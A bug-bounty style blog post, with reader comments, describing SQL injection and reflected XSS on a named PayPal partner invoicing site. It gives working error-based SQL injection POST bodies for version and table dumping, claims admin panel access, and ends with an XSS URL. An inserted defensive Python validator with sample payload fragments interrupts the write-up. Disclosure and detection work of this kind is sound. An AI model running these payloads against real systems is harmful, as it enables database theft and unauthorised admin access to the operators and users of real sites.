PayPal Partner SQL Injection
One of the PayPal partner websites, http://ppinvoice.com/, was suffering from a SQL injection in a POST parameter. UNION-based injection was not possible here.
[code language="sql"]
LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
Since we cannot continue past the above error, we switch to double query (error-based) injection, which works perfectly.
[code language="sql"]
LoginForm[email]=1' and(select 1 from(select count(*),concat((select
(select concat(0x7e,0x27,cast(version() as char), 0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
[code language="sql"]
LoginForm[email]=1' or 1 GROUP BY concat_ws(' :: ',version(),
user(),database(),@@license,@@hostname,floor(rand(0)*2)) having min(0) or
1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
Dumping the database was quite easy, since there was no WAF or any kind of filtering in place. Out of the tables, let’s check out the admin table.
[code language="sql"]
LoginForm[email]=1' or (@:=1)||@ group by concat((select substr
(group_concat(' :: ',table_name),1,450) from information_schema.tables
WHERE table_schema=database()),@:=@-1)having @||min(@:=0)%23&LoginForm
[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
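The post notes that no WAF or filtering sat in front of the login form. As an added example (not code from the original post or from the site), the Python below decodes a form-encoded login body and checks the `LoginForm[email]` field against an email allowlist and against markers visible in the payloads above. The function name, marker names and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Markers taken from the payloads shown on this page; matched after
# URL-decoding, whitespace collapsing and lower-casing.
SQLI_MARKERS = {
    "union-select": re.compile(r"\bunion\s+select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "rand-floor-group": re.compile(r"floor\s*\(\s*rand\s*\("),
    "user-variable": re.compile(r"@\s*:="),
    "trailing-comment": re.compile(r"#\s*$"),
}

# Conservative allowlist for the field (assumption: ASCII addresses only).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,24}")


def inspect_login_body(body: str, field: str = "LoginForm[email]") -> dict:
    """Decode a form-encoded POST body and assess one field (hypothetical helper)."""
    values = parse_qs(body, keep_blank_values=True).get(field, [""])
    value = values[-1]  # if the field is repeated, judge the last occurrence
    normalized = re.sub(r"\s+", " ", value).lower()
    hits = sorted(n for n, rx in SQLI_MARKERS.items() if rx.search(normalized))
    return {
        "value": value,
        "valid_email": EMAIL_RE.fullmatch(value) is not None,
        "markers": hits,
    }


# Constructed sample bodies: one benign login and two shortened fragments
# modelled on the requests quoted in the post.
SAMPLES = [
    "LoginForm[email]=alice%40example.com&LoginForm[password]=x&yt0=3",
    "LoginForm[email]=-1' UNION SELECT 1,2,3%23&LoginForm[password]=3",
    "LoginForm[email]=1' and(select count(*),floor(rand(0)*2) from "
    "information_schema.tables)%23&LoginForm[password]=3",
]

if __name__ == "__main__":
    for body in SAMPLES:
        result = inspect_login_body(body)
        verdict = "accept" if result["valid_email"] else "reject"
        print(verdict, result["markers"], repr(result["value"]))
```

The allowlist alone rejects every request shown in the post; the markers are there for logging and alerting. Neither replaces binding the value as a query parameter on the server side.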
So finally I was able to log into their admin panel 😉
That’s not all: there is also a reflected XSS.
[code language="text"]http://ppinvoice.com/index.php/faq/faqlist?id=4?><svg/onload="prompt('Hello There')">[/code]
The copyright notice mentions Cisco too.
However, I reported it to PayPal and they said it’s out of scope. Well, I recently saw that another researcher who had found some issues in another PayPal partner website running SILK software was accepted while mine was not. The issue seems to be in the SILK software. It seems like they are a third party to PayPal. They are also a Magento Solution Provider according to their webpage.
You always make awesome things. Great bro, keep on hunting.
sweet stuff bro, awesome like always